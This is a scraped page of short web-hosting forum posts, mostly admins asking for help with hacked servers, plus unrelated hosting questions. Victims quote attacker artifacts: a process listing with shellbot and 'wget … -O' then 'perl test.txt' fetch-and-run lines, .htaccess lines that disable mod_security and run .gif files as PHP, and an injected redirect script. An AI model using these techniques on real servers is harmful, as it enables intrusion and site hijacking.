Autoban Hackers Searching For Phpmyadmin
			Aug 7, 2008
				I've seen perl scripts able to achieve this, so I am wondering if a tool similar to this has been released to work with APF / Iptables?
The script in question is a "bot trap" and you put a deny rule in robots.txt to a hidden file.
In that file, the script records the offending IP and blocks it in htaccess (once the file in question is hit by a bot/person).
Getting a bit tired of seeing these morons always searching for:
/phpmyadmin
/pma
etc, etc.
	
    	
    	
        Feb 3, 2008
        I'd like to buy a server from OVH, but my country is not in the available list.
I was wondering if there is anyone on this board who can buy and resell it to me.
I already tried fservers.net but they are not accepting new orders.
  
    
	
    	
    	
        Mar 29, 2008
        I want to have a cronjob that would search /home every 2 hours for a certain folder name, then save the path to a text file and notify me if found. Can anyone help me with what to put in the .php file and include that in the cronjob?
  
    
	
    	
    	
        Aug 15, 2007
        I'm currently a customer of The Planet and have been now for about 3-4 years. I've been very pleased with their service and their hardware. However, I'm getting to the point where I'd like to upgrade my server, and their upgrade prices, like most any other datacenter, are 100-200% more than retail. While I'm not against people making money, this to me seems a bit too much.
So I'm considering paying a bunch of money up front to buy a new Dell 1950 PowerEdge server, and in doing so I need to find a company that can colo the new server. However I know a little about dedicated servers but nothing about colo or where to even start. I've found a few companies here in Lexington, KY as well as Louisville, KY and a few other companies in surrounding areas but I don't know the slightest thing I should be asking about. When searching for a dedicated machine it was easy - bandwidth and system specs.
What are a good list of questions I should be asking these companies when I call them for prices and availability?
  
    
	
    	
    	
        Apr 12, 2008
        When I look around, almost all offers are web hosting, such as dedicated or managed servers with PHP, MySQL and so on.
What I need is (big) pure backup space which must be at least accessible by a (reliable and pretty fast but not absolutely ultra-high-speed) ftp server (which supports resuming of ftp sessions).
Needed space: 200 GB
Traffic per month: 200-500 GB (can be at night)
(only) Nice to have (but not absolutely required):
- TLS/SSL Encryption for ftp
- 2-5 more ftp accounts (sharing the same space)
- crontab and perl scripts
- WebDav
  
    
	
    	
    	
        Sep 15, 2008
        I want a reliable network. I would prefer having a dedicated 10mbit rather than 100mbps shared.
Server requirements:
Reliable fast network.
2Gigs of Ram
WHM
I will be hosting online games on the server so the latency is very important. Server can be either in UK or USA.
Budget: 140USD per month. Not interested in servers with setup fees.
  
    
	
    	
    	
        Oct 13, 2007
        This question is about a shared hosting server running Cpanel on CentOS. A script on the server is sending out a SYN flood targeted at an external third-party website. While running netstat, I can see that the main IP of the server is making lots of SYN connections to the external site.
How can I find out which script on the server is initiating those SYN connections?
  
    
	
    	
    	
        Sep 7, 2007
        I'm searching for server monitoring software which can call the phone of a technician, either by ISDN or with a gnokii mobile phone.
The software should then tell on the phone which server is down or which service is down.
Does something like this already exist?
  
    
	
    	
    	
        Jun 26, 2014
        This applies to both Horde and roundcube webmail client software;
Using Plesk 11.5.30 with Horde 5.1.5 or roundcube 0.9.5 on CentOS Linux release 6.5 (Final).
We have seen this behavior occur on multiple servers.
Clients experienced slow to no response after executing a search, which eventually results in a failed to communicate with the server-error in the webmail client.
The Apache server log shows script time-out errors when searching larger mailboxes (i.e. larger than 950 MB), this does not happen on smaller mailboxes.
We have seen errors like the following in the Apache server error log with Horde (personal data like IP-address and domain name are x'ed out):
[Thu Jun 19 14:55:06 2014] [warn] [client xx.xxx.xxx.xxx] mod_fcgid: read data timeout in 45 seconds, referer: http://webmail.xxxxxxx.com/imp/dynamic.php?page=mailbox
[Thu Jun 19 14:55:06 2014] [error] [client xx.xxx.xxx.xxx] Premature end of script headers: ajax.php, referer: http://webmail.xxxxxxx.com/imp/dynamic.php?page=mailbox
And with Roundcube:
[Tue Jun 17 13:02:04 2014] [warn] [client xx.xxx.xxx.xxx] mod_fcgid: read data timeout in 45 seconds, referer: https://webmail.xxxxxxxxxxx.com/?_t...d=19445&_mbox=INBOX&_caps=pdf=0,flash=1,tif=0
[Tue Jun 17 13:02:04 2014] [error] [client xx.xxx.xxx.xxx] Premature end of script headers: index.php, referer: https://webmail.xxxxxxxxxxx.com/?_t...d=19445&_mbox=INBOX&_caps=pdf=0,flash=1,tif=0
Steps to reproduce:
- use a large mailbox (950 MB or higher)
- login to the webmail (Horde or roundcube)
- do a search in the search field on the top right
- the time-out error should appear in the server Apache error log (after at least 45 seconds)
This seems like an inefficiency or bug in the search query that searches the user's mailbox. Is there any other way we can prevent this issue and the error messages?
  
    
	
    	
    	
        Jan 21, 2007
        Hackers these days don't hack for money, a lot of times they hack for pride and the lame fun in it.
Look at this website,
[url]
  
    
	
    	
    	
        Dec 27, 2007
        I am constantly battling hackers over the last week and I have to admit I'm not really sure what it is that is letting them in, but they're getting in... the processes all run as "apache" so clearly it's the webserver somehow.
I've changed the ssh port, have disabled cron on the apache user and have set php safe_mode on the site I think might be to blame, but still no luck.
Logged in this morning to be greeted by this...
Quote:
[root@s15247463 httpdocs]# ps -fe | grep apache
apache    2889  2220  1 Dec26 ?        00:18:36 /usr/sbin/httpd
apache    2891  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
apache    2892  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache    2893  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache    2894  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
apache    2895  2220  0 Dec26 ?        00:00:05 /usr/sbin/httpd
apache    2896  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   14664  2220  0 Dec26 ?        00:00:03 /usr/sbin/httpd
apache   32714     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
apache   32719     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
apache   19751  2894  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   19764     1 23 Dec26 ?        03:31:35 shellbot      
apache   28642  2220  0 Dec26 ?        00:00:04 /usr/sbin/httpd
apache   28662  2891  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   28666     1 22 Dec26 ?        03:23:10 shellbot      
apache   29532  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
apache   29933  2220  0 Dec26 ?        00:07:18 /usr/sbin/httpd
apache   20833  2893  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20838     1 13 Dec26 ?        01:21:35 [httpds]   
apache   20847 29532  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20853     1 13 Dec26 ?        01:21:33 [httpds]   
apache   20870  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   20879  2892  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20884     1 13 Dec26 ?        01:21:28 [httpds]   
apache   20887  2896  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20892     1 13 Dec26 ?        01:21:16 [httpds]   
apache   20895  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
apache   20896  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   20901  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   21445  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
apache    1875     1  0 00:01 ?        00:00:00 [httpds]   
apache    2237     1  0 00:14 ?        00:00:00 ./mocks start
apache    5465 20895  0 00:23 ?        00:00:00 [sh] <defunct>
apache    5477     1  6 00:23 ?        00:24:48 shellbot      
apache   10110 14664  0 01:00 ?        00:00:00 [sh] <defunct>
apache   10142     1 11 01:00 ?        00:44:09 shellbot      
apache   10537  2220  0 01:27 ?        00:00:01 /usr/sbin/httpd
apache   13780     1  0 02:28 ?        00:00:00 [httpds]   
apache   13781 13780  0 02:28 ?        00:00:00 sh -c wget [url]
-O [url]
apache   13784     1  0 02:28 ?        00:00:00 [httpds]   
apache   13785 13784  0 02:28 ?        00:00:00 sh -c wget[url]
 -O [url]
apache   13788     1  0 02:28 ?        00:00:00 [httpds]   
apache   13789 13788  0 02:28 ?        00:00:00 sh -c wget [url]
-O [url]
apache   13792     1  0 02:28 ?        00:00:00 [httpds]   
apache   13793 13792  0 02:28 ?        00:00:00 sh -c wget [url]
-O [url]
apache   13798 13789  0 02:29 ?        00:00:00 perl test.txt
apache   13802 13781  0 02:29 ?        00:00:00 perl test.txt
apache   13806 13793  0 02:29 ?        00:00:00 perl test.txt
apache   13810 13785  0 02:29 ?        00:00:00 perl test.txt
apache   22282  2220  0 03:40 ?        00:00:00 /usr/sbin/httpd
apache   22434 20896  0 03:51 ?        00:00:00 [sh] <defunct>
apache   22442     1 10 03:51 ?        00:20:33 [httpd]
apache   22513 21445  0 03:55 ?        00:00:00 [perl] <defunct>
apache   22515     1  0 03:55 ?        00:00:00 /usr/local/apache/bin/nscan -DSSL
apache   22552  2220  0 03:58 ?        00:00:00 /usr/sbin/httpd
apache   23183     1  0 04:03 ?        00:00:48 /usr/local/apache/bin/nscan -DSSL
apache   23187     1  0 04:03 ?        00:00:47 /usr/local/apache/bin/nscan -DSSL
apache    3606  2220  0 04:52 ?        00:00:00 /usr/sbin/httpd
apache   27716     1  0 06:54 ?        00:00:00 [httpd]
apache   27720     1  0 06:54 ?        00:00:00 ./php
apache   28140     1  0 07:06 ?        00:00:00 /bin/sh ./mass 139
apache   28299 28140  0 07:12 ?        00:00:00 /bin/bash ./a 139.1
apache   28302 28299  9 07:12 ?        00:00:20 /bin/bash  139.1 22
  
    
	
    	
    	
        Mar 12, 2007
        We are rookies and we are being attacked by hackers for the second time in as many weeks.  I can see them in shell right now on multiple servers. I can not remember in all the excitement how to take away their root access. How do I stop them from doing any more damage?
  
    
	
    	
    	
        May 18, 2007
        this is the site whose banners appeared on my kids site after hacking, 
  
    
	
    	
    	
        May 1, 2009
        Twice in about a week, maybe 2 weeks, my server provider has sent me spoof abuse messages on accounts on my server. These phishing pages first linked to a bank then PayPal; these phishing pages that were placed were on 2 different accounts, and the accounts belong to people I've known for a very long time and they wouldn't have any idea how to do this, so I know it's a hacker getting in somehow.
How can I stop this from happening? Any programs that I can run on the server?
Heck, even which log files I should check to see where these attacks are coming from would help, as I could block the IPs.
I'm running cpanel as well if that helps, I use CSF.
I don't want to have to move servers as that would take a very long time for me.
  
    
	
    	
    	
        May 7, 2009
        My PR4 site has been hacked by Chinese hackers.
They fortunately did not do anything exceptionally terrible, but the site was down, they altered the serps results and now my inbox (operating from SquirrelMail) is receiving even more spam than before.
A network expert suggested that my server would now be being used for sending spam. 
And my company, who will remain nameless atm seem to claim that no server is safe from hackers under any circumstances.
I would like to copy to you the company's response to my questions and I would hope for a word or two of inspiration and encouragement from you?
The second string in each question is the server company's response.
1.Please quote me for checking to see if the server is being used for spam and blocking this from happening.
We could certainly check and see if your server is currently sending out any spam and try to identify where it is originating from.  Depending on the issue a fix may be required by your developers
2.Running a check on the sites code to see if there has been any amendments to the coding on the site 
We can check and see if there has been any FTP access and look at file modification dates, this would hopefully pick up any issues.
3.Making sure the server is safe and that all China ip ranges are banned.
Whilst we cannot ban all Chinese ranges as we do not know all ranges China uses we can lock FTP and SSH access to certain ranges only, you would need to provide these ranges.
4.Applying a second level of security to stop a spammer from hacking the system ( However I am sure I already have anti virus and spy ware on the server )
I’m not sure you do have any anti-virus/spyware on your server, it is certainly not something we install.  I don’t really believe either of those tools would stop someone hacking the server either, Linux servers don’t really get affected by that.  We could run a rootkit checker which checks for backdoors and modification of the operating system files.  We would also suggest making sure the scripts are secure and any web interface (admin area) logins have secure passwords and are also IP restricted.
For the work above we would charge 1 hour support at £150 per hour ex vat.
  
    
	
    	
    	
        Feb 21, 2007
        I am giving a few tips on securing your server against hack attempts. You must check these in spite of other securities like firewall, rootkit detectors etc.
1. Most Important, do not disable safe_mode under php.ini. If any customer asks to disable it, turn it off on his account only, not on whole server.
As most of the time attack is done using shellc99 (phpshell) script. In case safe_mode is off on server and there are public dirs with 777 permission, he can easily hack through.
2. Compile apache with safe mode as well.
3. In cpanel under tweak settings, turn on base_dir, if someone requests to turn off, turn it off on his/her account only. As using phpshell one can easily move to main server dirs like /etc, /home.
4.  Do not allow Anonymous Ftp on your server. You can turn it off from ftp config under WHM Service Configuration. If it's allowed, one can easily bind port using nc tool with your server and gain root access. Always keep it disabled.
5. Make sure /tmp is secured. You can easily do that by running this command /scripts/securetmp using ssh. But do make sure, /tmp is secured. Else one can upload some kind of perl script in /tmp dir and can deface or damage all data on the few/all accounts on your server.
keeping your server secure from hack attempts.
  
    
	
    	
    	
        May 23, 2007
        What would you think about creating a big text file with IPs of known hackers, bots and similar "bad" creatures to keep out from our servers? Do you think it's worth it?
You can post lists of IPs if you want...
  
    
	
    	
    	
        Sep 27, 2007
        I've been on yet-another crusade this morning..and have a few questions for the..umm.."general" hosting audience.
We live in odd times. If you told me that script kiddies might be able to completely compromise a server via php..or that spammers are now using the webserver *itself* to send spam a few years ago..I would have laughed. This is no laughing matter.
A concept of privacy comes into play..and I'm curious how many of you handle it. Joe pays me for an account..agrees to my TOS/AUP..and starts uploading files. The way I see it..we have many ways of dealing with scripts that do bad things. It seems to me, though...this may be considered "spying" on our customers.
If we have a script..say..that runs every fifteen minutes..and looks for these scripts..wouldn't that be considered spying?
Or would this be something we should just bury in our aup/tos that this might happen? I have read and agreed to quite a few of those AUP/TOS things..and I can't remember even one time even a mention that files that I upload to the server may be scanned or inspected..before allowing the file to be placed on the server.
Never..not once. 
However...this may have changed. If you've ever tried to get even a simple Perl script to work on a Cpanel server...you probably understand that many safeguards are there for the sake of everybody else on the server...and may prevent you from doing what you want to do with the script(s).
At the same time..though..it seems to fly in the face of common sense that many script packages available today are inherently insecure. Chmod 777 files and directories? Even in the times we live in today and know this is a very, very bad idea?
Yet..there seem to be even more like this today than ever before.
>>I mention this from first hand experience. One of the many magazines I get had an article detailing the trials the author was having trying to get Simple Groupware working on a vps.
yesterday..I noticed a post with a person wanting something installed on a production server. Not only was the program a beta..but..just like Simple Groupware..looked horribly insecure.
In retrospect...I can remember the very first php script I ever used. The year was 1996..and this was my first Cpanel shared account. I even remember having to add *.php to the mime types.
It installed without a hitch..and..coming from the Perl world I had spent many years in..and many hours getting those scripts to work..it seemed almost like a miracle.
It seems, as hosts, there are a few ways we can go at this.
1) Modify the ftp server so it inspects files
2) Have a program that looks for things..much like rkhunter does.
3) A front-end for all scripts..perhaps MySQL as well..that enforces rulesets..for restricted content..or resource allocations.
  
    
	
    	
    	
        Jan 16, 2007
        One of my servers which hosts 200 domains is being attacked by hacker(s).  It seems any world writeable files are being replaced or modified by the linux account nobody.  How can I secure this account?  Is it safe to change the password?  I know many processes depend on using the nobody account to run. 
  
    
	
    	
    	
        Jun 25, 2007
        guys I'm tired of fighting those hackers every day! I have about 20 websites, and every day I have one of them hacked! I restore a backup then another one is hacked!
 
that's unbelievable!!!
those bastards upload their shell scripts to websites via bugs or whatever from php files!!
 
is there any way to stop these commands?
can .htaccess help? how?
 
i talked to my webhosting companies for my websites! ....
  
    
	
    	
    	
        Nov 7, 2009
        Two of my websites on the server were changed by the hackers. How did they do it?
  
    
	
    	
    	
        Mar 27, 2009
        In your view, what must a webmaster do to prevent getting hacked?
  
    
	
    	
    	
        Aug 7, 2008
        how to secure my website from hackers, or anything like that. I host my own website, from a home server and I was wondering what I can do to protect me and my website.
  
    
	
    	
    	
        Jan 18, 2008
        My site is going down a lot of times due to high CPU quota, and when I check the CPU exceeded logs I can see some IP addresses trying to open non-existent permalinks, i.e. my site is smartdesis.com and they try to open smartdesis.com/xxx, which gives a 404 error which is causing high CPU usage. Repeatedly they are trying to open different URLs by appending /xxx to them; I banned nearly 100 IPs but they seem to be growing.
  
    
	
    	
    	
        Aug 3, 2008
        I am suffering from a hacker; every time, he changes my client’s index (index.php).
 
I changed FTP log, but still, it seems it doesn’t work!
My simple question: How to protect the index page from hackers?
  
    
	
    	
    	
        Feb 3, 2008
        i have a problem with a hacker that uses .htaccess to disable mod_security
using this code
PHP Code:
<IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
</IfModule> 
so is there a way to stop this?
also they have come up with a smart way to run shell files named as images using this code in .htaccess
PHP Code:
AddType application/x-httpd-php .gif 
is there a way to disable the "AddType application"?
  
    
	
    	
    	
        Jul 12, 2008
        I've been concerned about executing commands through (./) using php and perl shells on the server 
a new way of hacking these days is using perl shells , even if the perl was terminated on the server ,, or was forbidden for users
hackers upload a (perl) program to the server to use it instead of the server's own perl
any way ,,
chmoding the (ls-cat-more-less) to 4750 seems to give permission denied when executing these programs on the server
but the hackers also found that they could upload their own ls-cat-more-less programs and use them instead of the server's
they also could rename them ls==>ki or anything and use them like this
./ki /etc/valiases -alXrt 
and the commands work like charm for them
./ <<--- this command uses the sh program on the server ,, ((sh which refers to bash on most servers))
so
./ki 
is the same as
sh ki
and
bash ki
so i tried chmoding sh with 4750 and that killed the exploit
i was concerned about cpanel's and the website's functionality 
so i tried changing an accounts password and creating a database ,, they both worked fine
so ,, if you think chmoding 4750 sh is a bad idea please let me know
and if you know any other ways of disabling all the perl scripts on the server
  
    
	
    	
    	
        Dec 19, 2008
        ThePlanet.com permitting hackers or just incompetent?
It sort of seems that way.  I noticed my former boss's site was redirecting to the searchportal.information.com linkfarm junk site.  I knew this was not his site and took a closer look at the link that I saw when I visited his site.  I use NoScript in firefox and saw this as as a link on his primary page that the script was trying to make me go to.  [url]
This script then redirects me to this junk site.  
[url]...BDlaBQlSAFADDw
I would not recommend going there unless you have Firefox  installed with NoScript installed along with Adblock Plus. Who knows what exactly this site may be trying to do.  Anyway, I noticed this was happening and took a look at the source of my boss's site as it is now and this is what I get:
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<BODY>
<script type="text/javascript">
<!--
window.location = [url]
//-->
</script>
</BODY>
</HTML>
So JavaScript is being executed, which executes that code located on ThePlanet.com's service.  Using the IP address that is hosting the script, I did a DNS check and came up with this: [url]
Quote:
OrgName:    ThePlanet.com Internet Services, Inc. 
OrgID:      TPCM
Address:    315 Capitol
Address:    Suite 205
City:       Houston
StateProv:  TX
PostalCode: 77002
Country:    US
ReferralServer: rwhois://rwhois.theplanet.com:4321
NetRange:   216.40.192.0 - 216.40.255.255 
CIDR:       216.40.192.0/18 
OriginAS:   AS13749,  AS13884,  AS21844,  AS30315
OriginAS:   AS36420
NetName:    NETBLK-THEPLANET-BLK-EV1-5
NetHandle:  NET-216-40-192-0-1
Parent:     NET-216-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.EV1SERVERS.NET
NameServer: NS2.EV1SERVERS.NET
Comment:    ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate:    2000-10-05
Updated:    2008-02-28
OrgAbuseHandle: ABUSE271-ARIN
OrgAbuseName:   The Planet Abuse 
OrgAbusePhone:  +1-281-714-3560
OrgAbuseEmail:  abuse@theplanet.com
OrgNOCHandle: THEPL-ARIN
OrgNOCName:   The Planet NOC 
OrgNOCPhone:  +1-281-714-3555
OrgNOCEmail:  noc@theplanet.com
OrgTechHandle: TECHN33-ARIN
OrgTechName:   Technical Support 
OrgTechPhone:  +1-214-782-7800
OrgTechEmail:  admins@theplanet.com
# ARIN WHOIS database, last updated 2008-12-18 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
So I sent ThePlanet.com an email to Abuse@theplanet.com two days ago which is what their tech support phone number told me.  This is the email I sent two days ago minus any information that would embarrass my former boss.
Quote:
Hi,
>
> I was taking a look at my former employers website to see if they had done
> anything new with it and I saw this happen today. The domain is
> website.  I would not recommend you going to the site unless you
> are using Firefox for a browser and have the NoScript plugin installed.  A
> perl script tries to automatically redirect with the domain of
> [url].  This script automatically forwards to
> [url]
> .
>
> I think all that applies to you is that whoever owns the server or account
> with IP 216.40.254.78 has been most likely compromised. A support
> representative from your company said I must email you regarding this.  I
> got the contact information from the IP address within the script by looking
> it up here: [url].  I also
> notice that the entire IP address is compromised.
> I have notified the owner of website as they use a different
> host (Godaddy) and will need to have their hosting account cleaned up.  I suppose it is also possible that someone is using your service for nefarious activities.
>
> If you have any further questions, please feel free to reply.
>
> Regards,
> Lee
This is the email I got just a few minutes from ThePlanet.com.
Quote:
On Thu, Dec 18, 2008 at 10:03 PM, <abuse@theplanet.com> wrote:
>
> Reference: [ThePlanetAbuse-C30396127D]
>
> Dear Sir or Madam,
>
> We appreciate you bringing this to our attention.  We feel this issue has already been resolved, as we are unable to access the material in question.
>
> --
> Regards,
> Abuse Department
> The Planet
> abuse@theplanet.com
> [url]
Now if you take a look at the above perl script, it is still there and going to that IP still executes that script and redirects you to the link farm.
I replied with this just a few minutes ago.
Quote:
You do understand that when you go to the site of website.com
it redirects to one of your servers with an IP of 216.40.254.78.
The actual script that runs is this one: [url]
This then redirects to a link farm located on [url].  You do know that IP is your IP
and that it is still there?   That IP is one of yours according to
this:  [url]
One of two things is happening here.
1.  The person who hacked someone else's website (website.com)
either owns the server with the IP address listed above or this person
hacked this server or.
2.  Your server is being used in illegal hacking activity to redirect
visitors of other websites to a site whose only purpose is to make
money through a link farm.
Either one of those above is unacceptable and to say that the material
doesn't exist on your own server when I can see it from here would be
an inaccurate statement.
When viewing the source of website.com domain, this is the source HTML.
This is very much using your server and hosting service to redirect
unsuspecting users to a nefarious website.
  
    
	
    	
    	
        Sep 4, 2008
        Yesterday andhrahost.com hacked our WHMCS and sent emails to many of our customers.
Here is the screenshot:
[url]
[url]
He also deleted all admin logs, but luckily I took this screenshot.
Around 2 months back this also happened to us and we even informed OC3 about it, but that time also Mr Alex Ferrari from OC3 Networks replied to me and didn't take any action on it. We daily get spam from OC3 Networks IP.
Regularly they were trying to hack our WHMCS and yesterday they did it.
I have even sent an email to OC3 Networks and this time also no reply from them, and the hacker/spammer server is still up and selling warez hosting, illegal hosting openly.
Kindly guide me how to proceed to take action against OC3 Networks and against that hosting company who is doing this regularly.
  
    
	
    	
    	
        May 7, 2007
        Does the use of partitions prevent hackers from getting access to the entire Unix server?
  
    
	
    	
    	
        Dec 3, 2008
        i downloaded a copy of phpmyadmin and uploaded it to my hosting.. then i run mydomain.com/phpmyadmin/setup configured the server to my hosting IP address but it says i can't login using myusername@localhost do i need to do something on a cpanel mysql server to listen to the external phpmyadmin?